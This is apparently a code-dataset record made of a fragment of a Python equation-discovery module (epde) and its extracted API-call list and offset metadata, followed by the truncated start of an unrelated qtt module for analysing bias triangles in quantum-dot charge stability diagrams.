if Check_Unqueness(new_term, self.structure):
break
self.structure.append(new_term)
for idx, _ in enumerate(self.structure):
self.structure[idx].use_cache()
@property
def contains_deriv(self):
return any([term.contains_deriv for term in self.structure])
@property
def forbidden_token_labels(self):
target_symbolic = [factor.label for factor in self.structure[self.target_idx].structure]
forbidden_tokens = set()
for token_family in self.pool.families:
for token in token_family.tokens:
if token in target_symbolic and token_family.status['unique_for_right_part']:
forbidden_tokens.add(token)
return forbidden_tokens
def reconstruct_to_contain_deriv(self):
while True:
replacement_idx = np.random.randint(low = 0, high = len(self.structure))
temp = Term(self.pool, max_factors_in_term=self.max_factors_in_term) # , forbidden_tokens=self.forbidden_token_labels
if temp.contains_deriv:
self.structure[replacement_idx] = temp
break
def reconstruct_by_right_part(self, right_part_idx):
new_eq = copy.deepcopy(self)
self.copy_properties_to(new_eq)
new_eq.target_idx = right_part_idx
if any([factor.status['unique_for_right_part'] for factor in new_eq.structure[right_part_idx].structure]):
for term_idx, term in enumerate(new_eq.structure):
if term_idx != right_part_idx:
term.Filter_tokens_by_right_part(new_eq.structure[right_part_idx], self, term_idx)
new_eq.reset_saved_state()
return new_eq
def evaluate(self, normalize = True, return_val = False, save = True):
self._target = self.structure[self.target_idx].evaluate(normalize)
feature_indexes = list(range(len(self.structure)))
feature_indexes.remove(self.target_idx)
for feat_idx in range(len(feature_indexes)):
if feat_idx == 0:
self._features = self.structure[feature_indexes[feat_idx]].evaluate(normalize)
elif feat_idx != 0:
temp = self.structure[feature_indexes[feat_idx]].evaluate(normalize)
self._features = np.vstack([self._features, temp])
else:
continue
if self._features.ndim == 1:
self._features = np.expand_dims(self._features, 1)
temp_feats = np.vstack([self._features, np.ones(self._features.shape[1])])
self._features = np.transpose(self._features); temp_feats = np.transpose(temp_feats)
if return_val:
self.prev_normalized = normalize
if normalize:
elem1 = np.expand_dims(self._target, axis = 1)
value = np.add(elem1, - reduce(lambda x,y: np.add(x, y), [np.multiply(weight, temp_feats[:,feature_idx])
for feature_idx, weight in np.ndenumerate(self.weights_internal)]))
else:
elem1 = np.expand_dims(self._target, axis = 1)
value = np.add(elem1, - reduce(lambda x,y: np.add(x, y), [np.multiply(weight, temp_feats[:,feature_idx])
for feature_idx, weight in np.ndenumerate(self.weights_final)]))
return value, self._target, self._features
else:
return None, self._target, self._features
def reset_state(self, reset_right_part : bool = True):
if reset_right_part: self.right_part_selected = False
self.weights_internal_evald = False
self.weights_final_evald = False
self.fitness_calculated = False
self.solver_form_defined = False
@Reset_equation_status(reset_input = False, reset_output = True)
@History_Extender('\n -> was copied by deepcopy(self)', 'n')
def __deepcopy__(self, memo = None):
clss = self.__class__
new_struct = clss.__new__(clss)
memo[id(self)] = new_struct
attrs_to_avoid_copy = ['_features', '_target']
# print(self.__slots__)
for k in self.__slots__:
try:
# print('successful writing', k, getattr(self, k))
if k not in attrs_to_avoid_copy:
setattr(new_struct, k, copy.deepcopy(getattr(self, k), memo))
else:
setattr(new_struct, k, None)
except AttributeError:
# print('unsuccessful writing', k)
pass
# new_struct.__dict__.update(self.__dict__)
# new_struct.structure = copy.deepcopy(self.structure)
return new_struct
def copy_properties_to(self, new_equation):
new_equation.weights_internal_evald = self.weights_internal_evald
new_equation.weights_final_evald = self.weights_final_evald
new_equation.right_part_selected = self.right_part_selected
new_equation.fitness_calculated = self.fitness_calculated
new_equation.solver_form_defined = self.solver_form_defined
try:
new_equation._fitness_value = self._fitness_value
except AttributeError:
pass
def add_history(self, add):
self._history += add
@property
def history(self):
return self._history
@property
def fitness_value(self):
return self._fitness_value
@fitness_value.setter
def fitness_value(self, val):
self._fitness_value = val
def penalize_fitness(self, coeff = 1.):
self._fitness_value = self._fitness_value*coeff
@property
def weights_internal(self):
if self.weights_internal_evald:
return self._weights_internal
else:
raise AttributeError('Internal weights called before initialization')
@weights_internal.setter
def weights_internal(self, weights):
self._weights_internal = weights
self.weights_internal_evald = True
self.weights_final_evald = False
@property
def weights_final(self):
if self.weights_final_evald:
return self._weights_final
else:
raise AttributeError('Final weights called before initialization')
@weights_final.setter
def weights_final(self, weights):
self._weights_final = weights
self.weights_final_evald = True
@property
def latex_form(self):
form = r""
for term_idx in range(len(self.structure)):
if term_idx != self.target_idx:
form += str(self.weights_final[term_idx]) if term_idx < self.target_idx else str(self.weights_final[term_idx-1])
form += ' * ' + self.structure[term_idx].latex_form + ' + '
form += str(self.weights_final[-1]) + ' = ' + self.structure[self.target_idx].text_form
return form
@property
def text_form(self):
form = ''
if self.weights_final_evald:
for term_idx in range(len(self.structure)):
if term_idx != self.target_idx:
form += str(self.weights_final[term_idx]) if term_idx < self.target_idx else str(self.weights_final[term_idx-1])
form += ' * ' + self.structure[term_idx].name + ' + '
form += str(self.weights_final[-1]) + ' = ' + self.structure[self.target_idx].name
else:
for term_idx in range(len(self.structure)):
form += 'k_'+ str(term_idx) + ' ' + self.structure[term_idx].name + ' + '
form += 'k_' + str(len(self.structure)) + ' = 0'
return form
def solver_form(self):
if self.solver_form_defined:
return self._solver_form
else:
self._solver_form = []
for term_idx in range(len(self.structure)):
if term_idx != self.target_idx:
term_form = self.structure[term_idx].solver_form
weight = self.weights_final[term_idx] if term_idx < self.target_idx else self.weights_final[term_idx-1]
term_form[0] = term_form[0] * weight
term_form[0] = torch.flatten(term_form[0]).unsqueeze(1).type(torch.FloatTensor)
self._solver_form.append(term_form)
free_coeff_weight = torch.from_numpy(np.full_like(a = global_var.grid_cache.get('0'),
fill_value = self.weights_final[-1]))
free_coeff_weight = torch.flatten(free_coeff_weight).unsqueeze(1).type(torch.FloatTensor)
target_weight = torch.from_numpy(np.full_like(a = global_var.grid_cache.get('0'),
fill_value = -1))
target_form = self.structure[self.target_idx].solver_form
target_form[0] = target_form[0] * target_weight
target_form[0] = torch.flatten(target_form[0]).unsqueeze(1).type(torch.FloatTensor)
self._solver_form.append([free_coeff_weight, [None,], 0])
self._solver_form.append(target_form)
self.solver_form_defined = True
return self._solver_form
@property
def state(self):
return self.text_form
@property
def described_variables(self):
eps=1e-7
described = set()
for term_idx, term in enumerate(self.structure):
if term_idx == self.target_idx:
described.update({factor.type for factor in term.structure})
else:
weight_idx = term_idx if term_idx < term_idx else term_idx - 1
if np.abs(self.weights_final[weight_idx]) > eps:
described.update({factor.type for factor in term.structure})
described = frozenset(described)
return described
def max_deriv_orders(self):
solver_form = self.solver_form()
max_orders = np.zeros(global_var.grid_cache.get('0').ndim)
def count_order(obj, deriv_ax):
if obj is None:
return 0
else:
return obj.count(deriv_ax)
for term in solver_form:
if isinstance(term[2], list):
for deriv_factor in term[1]:
orders = np.array([count_order(deriv_factor, ax) for ax #deriv_factor.count(ax)
in np.arange(max_orders.size)])
max_orders = np.maximum(max_orders, orders)
else:
orders = np.array([count_order(term[1], ax) for ax # term[1].count(ax)
in np.arange(max_orders.size)])
max_orders = np.maximum(max_orders, orders)
if np.max(max_orders) > 2:
raise NotImplementedError('The current implementation allows does not allow higher orders of equation, than 2.')
return max_orders
def boundary_conditions(self, main_var_key = ('u', (1.0,))):
required_bc_ord = self.max_deriv_orders() # We assume, that the maximum order of the equation here is 2
if global_var.grid_cache is None:
raise NameError('Grid cache has not been initialized yet.')
bconds = []
hardcoded_bc_relative_locations = {0 : None, 1 : (0,), 2 : (0, 1)}
tensor_shape = global_var.grid_cache.get('0').shape
def get_boundary_ind(tensor_shape, axis, rel_loc):
return tuple(np.meshgrid(*[np.arange(shape) if dim_idx != axis else min(int(rel_loc * shape), shape-1)
for dim_idx, shape in enumerate(tensor_shape)], indexing = 'ij'))
for ax_idx, ax_ord in enumerate(required_bc_ord):
for loc_fraction in hardcoded_bc_relative_locations[ax_ord]:
indexes = get_boundary_ind(tensor_shape, axis = ax_idx, rel_loc = loc_fraction)
coords = np.squeeze(np.array([global_var.grid_cache.get(str(idx))[indexes] for idx in np.arange(len(tensor_shape))])).T
vals = np.squeeze(global_var.tensor_cache.get(main_var_key)[indexes]).T
coords = torch.from_numpy(coords).type(torch.FloatTensor)
vals = torch.from_numpy(vals).type(torch.FloatTensor)
bconds.append([coords, vals])
print('shape of the grid', global_var.grid_cache.get('0').shape)
print('Obtained boundary conditions', len(bconds[0]))
return bconds
def standalone_boundary_conditions(max_deriv_orders, main_var_key = ('u', (1.0,))):
required_bc_ord = max_deriv_orders # We assume, that the maximum order of the equation here is 2
if global_var.grid_cache is None:
raise NameError('Grid cache has not been initialized yet.')
bconds = []
hardcoded_bc_relative_locations = {0 : None, 1 : (0,), 2 : (0, 1)}
tensor_shape = global_var.grid_cache.get('0').shape
def get_boundary_ind(tensor_shape, axis, rel_loc, old_way = False):
return tuple(np.meshgrid(*[np.arange(shape) if dim_idx != axis else min(int(rel_loc * shape), shape-1)
for dim_idx, shape in enumerate(tensor_shape)], indexing = 'ij'))
for ax_idx, ax_ord in enumerate(required_bc_ord):
for loc_fraction in hardcoded_bc_relative_locations[ax_ord]:
indexes = get_boundary_ind(tensor_shape, axis = ax_idx, rel_loc = loc_fraction)
coords = np.array([global_var.grid_cache.get(str(idx))[indexes] for idx in np.arange(len(tensor_shape))])
vals = global_var.tensor_cache.get(main_var_key)[indexes]
coords = torch.from_numpy(coords)
vals = torch.from_numpy(vals)
bconds.append([coords, vals])
return bconds
class SoEq(Complex_Structure, moeadd.moeadd_solution):
# __slots__ = ['tokens_indep', 'tokens_dep', 'equation_number']
def __init__(self, pool, terms_number, max_factors_in_term, sparcity = None, eq_search_iters = 100):
self.tokens_indep = TF_Pool(pool.families_meaningful) #[family for family in token_families if family.status['meaningful']]
self.tokens_dep = TF_Pool(pool.families_supplementary) #[family for family in token_families if not family.status['meaningful']]
self.equation_number = np.size(self.tokens_indep.families_cardinality())
if type(sparcity) != None: self.vals = sparcity
self.max_terms_number = terms_number; self.max_factors_in_term = max_factors_in_term
self.moeadd_set = False; self.eq_search_operator_set = False# ; self.evaluated = False
self.def_eq_search_iters = eq_search_iters
def use_default_objective_function(self):
from epde.eq_mo_objectives import system_discrepancy, system_complexity_by_terms
self.set_objective_functions([system_discrepancy, system_complexity_by_terms])
def set_objective_functions(self, obj_funs):
'''
Method to set the objective functions to evaluate the "quality" of the system of equations.
Parameters:
-----------
obj_funs - callable or list of callables;
function/functions to evaluate quality metrics of system of equations. Can return a single
metric (for example, quality of the process modelling with specific system), or
a list of metrics (for example, number of terms for each equation in the system).
The function results will be flattened after their application.
'''
assert callable(obj_funs) or all([callable(fun) for fun in obj_funs])
self.obj_funs = obj_funs
# import time
# print(len(self.obj_funs))
# time.sleep(10)
def set_eq_search_evolutionary(self, evolutionary):
# raise NotImplementedError('In current version, the evolutionary operatorshall be taken from global variables')
# assert type(evolutionary.coeff_calculator) != type(None), 'Defined evolutionary operator lacks coefficient calculator'
self.eq_search_evolutionary_strategy = evolutionary
self.eq_search_operator_set = True
def create_equations(self, population_size = 16, sparcity = None, eq_search_iters = None, EA_kwargs = dict()):
# if type(eq_search_iters) == type(None) and type(self.def_eq_search_iters) == type(None):
# raise ValueError('Number of iterations is not defied both in method parameter or in object attribute')
assert self.eq_search_operator_set
if type(eq_search_iters) == type(None): eq_search_iters = self.def_eq_search_iters
if type(sparcity) == type(None):
sparcity = self.vals
else:
self.vals = sparcity
self.population_size = population_size
self.eq_search_evolutionary_strategy.modify_block_params(block_label = 'truncation',
param_label = 'population_size',
value = population_size)
self.structure = []; self.eq_search_iters = eq_search_iters
token_selection = self.tokens_indep
self.vars_to_describe = {token_family.type for token_family in self.tokens_dep.families}
self.vars_to_describe = self.vars_to_describe.union({token_family.type for token_family in self.tokens_indep.families})
self.separated_vars = set()
for eq_idx in range(self.equation_number):
current_tokens = token_selection + self.tokens_dep
# print('Equation index', eq_idx, self.vals)
self.eq_search_evolutionary_strategy.modify_block_params(block_label = 'rps1', param_label = 'sparsity',
value = self.vals[eq_idx], suboperator_sequence = ['eq_level_rps', 'fitness_calculation', 'sparsity'])#(sparcity_value = self.vals[eq_idx])
self.eq_search_evolutionary_strategy.modify_block_params(block_label = 'rps2', param_label = 'sparsity',
value = self.vals[eq_idx], suboperator_sequence = ['eq_level_rps', 'fitness_calculation', 'sparsity'])#(sparcity_value = self.vals[eq_idx])
cur_equation, cur_eq_operator_error_abs, cur_eq_operator_error_structural = self.optimize_equation(pool = current_tokens,
strategy = self.eq_search_evolutionary_strategy, population_size = self.population_size,
separate_vars = self.separated_vars, EA_kwargs = EA_kwargs)
self.vars_to_describe.difference_update(cur_equation.described_variables)
self.separated_vars.add(frozenset(cur_equation.described_variables))
self.structure.append(cur_equation)
# self.single_vars_in_equation.update()
# cache.clear(full = False)
if not eq_idx == self.equation_number - 1:
global_var.tensor_cache.change_variables(cur_eq_operator_error_abs,
cur_eq_operator_error_structural)
# for idx, _ in enumerate(token_selection):
# token_selection[idx].change_variables(cur_eq_operator_error)
# obj_funs = np.array(flatten([func(self) for func in self.obj_funs]))
# np.array([self.evaluate(normalize = False),] + [eq.L0_norm for eq in self.structure])
moeadd.moeadd_solution.__init__(self, self.vals, self.obj_funs) # , return_val = True, self) super(
self.moeadd_set = True
def optimize_equation(self, pool, strategy, population_size, basic_terms : list = [],
separate_vars : set = None, EA_kwargs = dict()):
population = [Equation(pool, basic_terms, self.max_terms_number, self.max_factors_in_term)
for i in range(population_size)]
EA_kwargs['separate_vars'] = separate_vars
strategy.run(initial_population = population, EA_kwargs = EA_kwargs)
result = strategy.result
return result[0], result[0].evaluate(normalize = False, return_val=True)[0], result[0].evaluate(normalize = True, return_val=True)[0]
@staticmethod
def equation_opt_iteration(population, evol_operator, population_size, iter_index, separate_vars, strict_restrictions = True):
for equation in population:
if equation.described_variables in separate_vars:
equation.penalize_fitness(coeff = 0.)
population = Population_Sort(population)
population = population[:population_size]
gc.collect()
population = evol_operator.apply(population, separate_vars)
return population
def evaluate(self, normalize = True):
if len(self.structure) == 1:
value = self.structure[0].evaluate(normalize = normalize, return_val = True)[0]
else:
value = np.sum([equation.evaluate(normalize, return_val = True)[0] for equation in self.structure])
value = np.sum(np.abs(value))
return value
@property
def obj_fun(self):
# print('objective functions:', self.obj_funs)
# print('objective function values:', [func(self) for func in self.obj_funs], flatten([func(self) for func in self.obj_funs]))
return np.array(flatten([func(self) for func in self.obj_funs]))
def __call__(self):
assert self.moeadd_set, 'The structure of the equation is not defined, therefore no moeadd operations can be called'
return self.obj_fun
@property
def text_form(self):
form = ''
if len(self.structure) > 1:
for eq_idx, equation in enumerate(self.structure):
if eq_idx == 0:
form += '/ ' + equation.text_form + '\n'
elif eq_idx == len(self.structure) - 1:
form += '\ ' + equation.text_form + '\n'
else:
form += '| ' + equation.text_form + '\n'
else:
form += self.structure[0].text_form + '\n'
return form
def __eq__(self, other):
assert self.moeadd_set, 'The structure of the equation is not defined, therefore no moeadd operations can be called'
# eps = 1e-9
return (all([any([other_elem == self_elem for other_elem in other.structure]) for self_elem in self.structure]) and
all([any([other_elem == self_elem for self_elem in self.structure]) for other_elem in other.structure]) and
len(other.structure) == len(self.structure)) or all(np.isclose(self.obj_fun, other.obj_fun))
@property
def latex_form(self):
form = r"\begin{eqnarray*}"
for equation in self.structure:
form += equation.latex_form + r", \\ "
form += r"\end{eqnarray*}"
def __hash__(self):
return hash(tuple(self.vals))
|
[
"epde.interface.token_family.TF_Pool",
"numpy.abs",
"numpy.maximum",
"epde.supplementary.Population_Sort",
"numpy.ones",
"gc.collect",
"numpy.isclose",
"numpy.random.randint",
"numpy.arange",
"numpy.mean",
"torch.flatten",
"numpy.multiply",
"numpy.copy",
"numpy.std",
"numpy.ndim",
"numpy.transpose",
"epde.globals.tensor_cache.add",
"numpy.max",
"numpy.add",
"epde.moeadd.moeadd_stc.moeadd_solution.__init__",
"epde.globals.tensor_cache.get",
"copy.deepcopy",
"numpy.ndenumerate",
"epde.globals.tensor_cache.change_variables",
"epde.supplementary.Filter_powers",
"epde.globals.grid_cache.get",
"numpy.vstack",
"torch.from_numpy",
"epde.decorators.History_Extender",
"numpy.expand_dims",
"epde.decorators.Reset_equation_status",
"warnings.warn"
] |
[((728, 742), 'numpy.copy', 'np.copy', (['Input'], {}), '(Input)\n', (735, 742), True, 'import numpy as np\n'), ((21638, 21697), 'epde.decorators.Reset_equation_status', 'Reset_equation_status', ([], {'reset_input': '(False)', 'reset_output': '(True)'}), '(reset_input=False, reset_output=True)\n', (21659, 21697), False, 'from epde.decorators import History_Extender, Reset_equation_status\n'), ((21707, 21769), 'epde.decorators.History_Extender', 'History_Extender', (['"""\n -> was copied by deepcopy(self)"""', '"""n"""'], {}), '("""\n -> was copied by deepcopy(self)""", \'n\')\n', (21723, 21769), False, 'from epde.decorators import History_Extender, Reset_equation_status\n'), ((775, 790), 'numpy.ndim', 'np.ndim', (['matrix'], {}), '(matrix)\n', (782, 790), True, 'import numpy as np\n'), ((5841, 5891), 'numpy.random.randint', 'np.random.randint', (['(1)', '(self.max_factors_in_term + 1)'], {}), '(1, self.max_factors_in_term + 1)\n', (5858, 5891), True, 'import numpy as np\n'), ((13770, 13800), 'torch.from_numpy', 'torch.from_numpy', (['coeff_tensor'], {}), '(coeff_tensor)\n', (13786, 13800), False, 'import torch\n'), ((19061, 19080), 'copy.deepcopy', 'copy.deepcopy', (['self'], {}), '(self)\n', (19074, 19080), False, 'import copy\n'), ((20421, 20449), 'numpy.transpose', 'np.transpose', (['self._features'], {}), '(self._features)\n', (20433, 20449), True, 'import numpy as np\n'), ((20464, 20488), 'numpy.transpose', 'np.transpose', (['temp_feats'], {}), '(temp_feats)\n', (20476, 20488), True, 'import numpy as np\n'), ((30989, 31019), 'epde.globals.grid_cache.get', 'global_var.grid_cache.get', (['"""0"""'], {}), "('0')\n", (31014, 31019), True, 'import epde.globals as global_var\n'), ((32146, 32179), 'epde.interface.token_family.TF_Pool', 'TF_Pool', (['pool.families_meaningful'], {}), '(pool.families_meaningful)\n', (32153, 32179), False, 'from epde.interface.token_family import TF_Pool\n'), ((32276, 32312), 'epde.interface.token_family.TF_Pool', 'TF_Pool', (['pool.families_supplementary'], {}), '(pool.families_supplementary)\n', (32283, 32312), False, 'from epde.interface.token_family import TF_Pool\n'), ((37692, 37755), 'epde.moeadd.moeadd_stc.moeadd_solution.__init__', 'moeadd.moeadd_solution.__init__', (['self', 'self.vals', 'self.obj_funs'], {}), '(self, self.vals, self.obj_funs)\n', (37723, 37755), True, 'import epde.moeadd.moeadd_stc as moeadd\n'), ((38813, 38840), 'epde.supplementary.Population_Sort', 'Population_Sort', (['population'], {}), '(population)\n', (38828, 38840), False, 'from epde.supplementary import Filter_powers, Population_Sort, flatten\n'), ((38899, 38911), 'gc.collect', 'gc.collect', ([], {}), '()\n', (38909, 38911), False, 'import gc\n'), ((897, 912), 'numpy.ndim', 'np.ndim', (['matrix'], {}), '(matrix)\n', (904, 912), True, 'import numpy as np\n'), ((968, 994), 'numpy.arange', 'np.arange', (['matrix.shape[0]'], {}), '(matrix.shape[0])\n', (977, 994), True, 'import numpy as np\n'), ((6352, 6377), 'numpy.arange', 'np.arange', (['(1)', 'factors_num'], {}), '(1, factors_num)\n', (6361, 6377), True, 'import numpy as np\n'), ((7515, 7544), 'epde.supplementary.Filter_powers', 'Filter_powers', (['self.structure'], {}), '(self.structure)\n', (7528, 7544), False, 'from epde.supplementary import Filter_powers, Population_Sort, flatten\n'), ((8094, 8200), 'epde.globals.tensor_cache.get', 'global_var.tensor_cache.get', (['self.cache_label'], {'normalized': 'normalize', 'saved_as': 'self.saved_as[normalize]'}), '(self.cache_label, normalized=normalize,\n saved_as=self.saved_as[normalize])\n', (8121, 8200), True, 'import epde.globals as global_var\n'), ((9725, 9744), 'copy.deepcopy', 'copy.deepcopy', (['self'], {}), '(self)\n', (9738, 9744), False, 'import copy\n'), ((20279, 20312), 'numpy.expand_dims', 'np.expand_dims', (['self._features', '(1)'], {}), '(self._features, 1)\n', (20293, 20312), True, 'import numpy as np\n'), ((28856, 28874), 'numpy.max', 'np.max', (['max_orders'], {}), '(max_orders)\n', (28862, 28874), True, 'import numpy as np\n'), ((29456, 29486), 'epde.globals.grid_cache.get', 'global_var.grid_cache.get', (['"""0"""'], {}), "('0')\n", (29481, 29486), True, 'import epde.globals as global_var\n'), ((31737, 31761), 'torch.from_numpy', 'torch.from_numpy', (['coords'], {}), '(coords)\n', (31753, 31761), False, 'import torch\n'), ((31781, 31803), 'torch.from_numpy', 'torch.from_numpy', (['vals'], {}), '(vals)\n', (31797, 31803), False, 'import torch\n'), ((39335, 39348), 'numpy.abs', 'np.abs', (['value'], {}), '(value)\n', (39341, 39348), True, 'import numpy as np\n'), ((1051, 1068), 'numpy.std', 'np.std', (['matrix[i]'], {}), '(matrix[i])\n', (1057, 1068), True, 'import numpy as np\n'), ((8911, 8985), 'epde.globals.tensor_cache.add', 'global_var.tensor_cache.add', (['self.cache_label', 'value'], {'normalized': 'normalize'}), '(self.cache_label, value, normalized=normalize)\n', (8938, 8985), True, 'import epde.globals as global_var\n'), ((10578, 10607), 'epde.supplementary.Filter_powers', 'Filter_powers', (['self.structure'], {}), '(self.structure)\n', (10591, 10607), False, 'from epde.supplementary import Filter_powers, Population_Sort, flatten\n'), ((10725, 10841), 'warnings.warn', 'warnings.warn', (['"""Can not create unique term, while filtering equation tokens in regards to the right part."""'], {}), "(\n 'Can not create unique term, while filtering equation tokens in regards to the right part.'\n )\n", (10738, 10841), False, 'import warnings\n'), ((12074, 12094), 'copy.deepcopy', 'copy.deepcopy', (['token'], {}), '(token)\n', (12087, 12094), False, 'import copy\n'), ((12990, 13020), 'epde.globals.grid_cache.get', 'global_var.grid_cache.get', (['"""0"""'], {}), "('0')\n", (13015, 13020), True, 'import epde.globals as global_var\n'), ((20361, 20393), 'numpy.ones', 'np.ones', (['self._features.shape[1]'], {}), '(self._features.shape[1])\n', (20368, 20393), True, 'import numpy as np\n'), ((20607, 20643), 'numpy.expand_dims', 'np.expand_dims', (['self._target'], {'axis': '(1)'}), '(self._target, axis=1)\n', (20621, 20643), True, 'import numpy as np\n'), ((20930, 20966), 'numpy.expand_dims', 'np.expand_dims', (['self._target'], {'axis': '(1)'}), '(self._target, axis=1)\n', (20944, 20966), True, 'import numpy as np\n'), ((28041, 28071), 'epde.globals.grid_cache.get', 'global_var.grid_cache.get', (['"""0"""'], {}), "('0')\n", (28066, 28071), True, 'import epde.globals as global_var\n'), ((28814, 28844), 'numpy.maximum', 'np.maximum', (['max_orders', 'orders'], {}), '(max_orders, orders)\n', (28824, 28844), True, 'import numpy as np\n'), ((30457, 30487), 'epde.globals.grid_cache.get', 'global_var.grid_cache.get', (['"""0"""'], {}), "('0')\n", (30482, 30487), True, 'import epde.globals as global_var\n'), ((31652, 31693), 'epde.globals.tensor_cache.get', 'global_var.tensor_cache.get', (['main_var_key'], {}), '(main_var_key)\n', (31679, 31693), True, 'import epde.globals as global_var\n'), ((37193, 37298), 'epde.globals.tensor_cache.change_variables', 'global_var.tensor_cache.change_variables', (['cur_eq_operator_error_abs', 'cur_eq_operator_error_structural'], {}), '(cur_eq_operator_error_abs,\n cur_eq_operator_error_structural)\n', (37233, 37298), True, 'import epde.globals as global_var\n'), ((40936, 40975), 'numpy.isclose', 'np.isclose', (['self.obj_fun', 'other.obj_fun'], {}), '(self.obj_fun, other.obj_fun)\n', (40946, 40975), True, 'import numpy as np\n'), ((8458, 8472), 'numpy.ndim', 'np.ndim', (['value'], {}), '(value)\n', (8465, 8472), True, 'import numpy as np\n'), ((20136, 20169), 'numpy.vstack', 'np.vstack', (['[self._features, temp]'], {}), '([self._features, temp])\n', (20145, 20169), True, 'import numpy as np\n'), ((27740, 27778), 'numpy.abs', 'np.abs', (['self.weights_final[weight_idx]'], {}), '(self.weights_final[weight_idx])\n', (27746, 27778), True, 'import numpy as np\n'), ((28582, 28612), 'numpy.maximum', 'np.maximum', (['max_orders', 'orders'], {}), '(max_orders, orders)\n', (28592, 28612), True, 'import numpy as np\n'), ((8558, 8572), 'numpy.ndim', 'np.ndim', (['value'], {}), '(value)\n', (8565, 8572), True, 'import numpy as np\n'), ((8582, 8595), 'numpy.std', 'np.std', (['value'], {}), '(value)\n', (8588, 8595), True, 'import numpy as np\n'), ((8651, 8664), 'numpy.std', 'np.std', (['value'], {}), '(value)\n', (8657, 8664), True, 'import numpy as np\n'), ((26401, 26431), 'epde.globals.grid_cache.get', 'global_var.grid_cache.get', (['"""0"""'], {}), "('0')\n", (26426, 26431), True, 'import epde.globals as global_var\n'), ((26698, 26728), 'epde.globals.grid_cache.get', 'global_var.grid_cache.get', (['"""0"""'], {}), "('0')\n", (26723, 26728), True, 'import epde.globals as global_var\n'), ((30252, 30276), 'torch.from_numpy', 'torch.from_numpy', (['coords'], {}), '(coords)\n', (30268, 30276), False, 'import torch\n'), ((30324, 30346), 'torch.from_numpy', 'torch.from_numpy', (['vals'], {}), '(vals)\n', (30340, 30346), False, 'import torch\n'), ((1135, 1153), 'numpy.mean', 'np.mean', (['matrix[i]'], {}), '(matrix[i])\n', (1142, 1153), True, 'import numpy as np\n'), ((8635, 8649), 'numpy.mean', 'np.mean', (['value'], {}), '(value)\n', (8642, 8649), True, 'import numpy as np\n'), ((8696, 8710), 'numpy.ndim', 'np.ndim', (['value'], {}), '(value)\n', (8703, 8710), True, 'import numpy as np\n'), ((8720, 8733), 'numpy.std', 'np.std', (['value'], {}), '(value)\n', (8726, 8733), True, 'import numpy as np\n'), ((8773, 8787), 'numpy.mean', 'np.mean', (['value'], {}), '(value)\n', (8780, 8787), True, 'import numpy as np\n'), ((26566, 26598), 'torch.flatten', 'torch.flatten', (['free_coeff_weight'], {}), '(free_coeff_weight)\n', (26579, 26598), False, 'import torch\n'), ((26982, 27011), 'torch.flatten', 'torch.flatten', (['target_form[0]'], {}), '(target_form[0])\n', (26995, 27011), False, 'import torch\n'), ((28756, 28782), 'numpy.arange', 'np.arange', (['max_orders.size'], {}), '(max_orders.size)\n', (28765, 28782), True, 'import numpy as np\n'), ((30156, 30197), 'epde.globals.tensor_cache.get', 'global_var.tensor_cache.get', (['main_var_key'], {}), '(main_var_key)\n', (30183, 30197), True, 'import epde.globals as global_var\n'), ((31134, 31150), 'numpy.arange', 'np.arange', (['shape'], {}), '(shape)\n', (31143, 31150), True, 'import numpy as np\n'), ((20705, 20717), 'numpy.add', 'np.add', (['x', 'y'], {}), '(x, y)\n', (20711, 20717), True, 'import numpy as np\n'), ((20720, 20767), 'numpy.multiply', 'np.multiply', (['weight', 'temp_feats[:, feature_idx]'], {}), '(weight, temp_feats[:, feature_idx])\n', (20731, 20767), True, 'import numpy as np\n'), ((21029, 21041), 'numpy.add', 'np.add', (['x', 'y'], {}), '(x, y)\n', (21035, 21041), True, 'import numpy as np\n'), ((21044, 21091), 'numpy.multiply', 'np.multiply', (['weight', 'temp_feats[:, feature_idx]'], {}), '(weight, temp_feats[:, feature_idx])\n', (21055, 21091), True, 'import numpy as np\n'), ((28520, 28546), 'numpy.arange', 'np.arange', (['max_orders.size'], {}), '(max_orders.size)\n', (28529, 28546), True, 'import numpy as np\n'), ((29592, 29608), 'numpy.arange', 'np.arange', (['shape'], {}), '(shape)\n', (29601, 29608), True, 'import numpy as np\n'), ((20846, 20883), 'numpy.ndenumerate', 'np.ndenumerate', (['self.weights_internal'], {}), '(self.weights_internal)\n', (20860, 20883), True, 'import numpy as np\n'), ((21170, 21204), 'numpy.ndenumerate', 'np.ndenumerate', (['self.weights_final'], {}), '(self.weights_final)\n', (21184, 21204), True, 'import numpy as np\n'), ((26193, 26220), 'torch.flatten', 'torch.flatten', (['term_form[0]'], {}), '(term_form[0])\n', (26206, 26220), False, 'import torch\n')]
|
""" Functionality to analyse bias triangles
@author: amjzwerver
"""
#%%
import numpy as np
import qcodes
import qtt
import qtt.pgeometry
import matplotlib.pyplot as plt
from qcodes.plots.qcmatplotlib import MatPlot
from qtt.data import diffDataset
def plotAnalysedLines(clicked_pts, linePoints1_2, linePt3_vert, linePt3_horz, linePt3_ints, intersect_point):
""" Plots lines based on three points clicked
Args:
clicked_pts (array): lines between the three points (1-2), (2-3)
linePoints1_2 (array): line fitted through points 1 and 2
linePt3_vert (array): vertical line through point 3
linePt3_horz (array): horizontal line through point 3
linePt3_ints (array): line through point 3 and its vert/horz intersection
with the line through point 1,2
intersect_point (array): intersection point point 3, line1_2
"""
qtt.pgeometry.plot2Dline(linePoints1_2, ':c', alpha = .5)
qtt.pgeometry.plot2Dline(linePt3_vert, ':b', alpha=.4)
qtt.pgeometry.plot2Dline(linePt3_horz, ':b', alpha=.4)
qtt.pgeometry.plot2Dline(linePt3_ints, ':b', alpha=.4)
qtt.pgeometry.plotPoints(intersect_point, '.b')
qtt.pgeometry.plotPoints(clicked_pts[:,2:3], '.b')
linePt3_ints_short = np.column_stack((intersect_point, clicked_pts[:,2:3]))
qtt.pgeometry.plotPoints(linePt3_ints_short, 'b')
def perpLineIntersect(ds, description, vertical = True, points=None):
""" Takes three points in a graph and calculates the length of a linepiece
between a line through points 1,2 and a vertical/horizontal line
through the third point. Uses the currently active figure.
Args:
ds (dataset): dataset with charge stability diagram and gate voltage in mV
vertical (bool): find intersection of point with line vertically (True)
or horizontally (False)
description:
Returns:
(dict): 'intersection_point' = intersetcion point
'distance' = length of line from 3rd clicked point to line
through clicked points 1 and 2
'clicked_points' = coordinates of the three clicked points
"""
diffDataset(ds, diff_dir='xy')
plt.figure(588); plt.clf()
MatPlot(ds.diff_dir_xy, num = 588)
ax = plt.gca()
ax.set_autoscale_on(False)
ax.set_xlabel(ax.get_xlabel()[:2])
ax.set_ylabel(ax.get_ylabel()[:2])
# ax = plt.gca()
# ax.set_autoscale_on(False)
if description == 'lever_arm' and vertical == True:
print('''Please click three points;
Point 1: on the addition line for the dot represented on the vertical axis
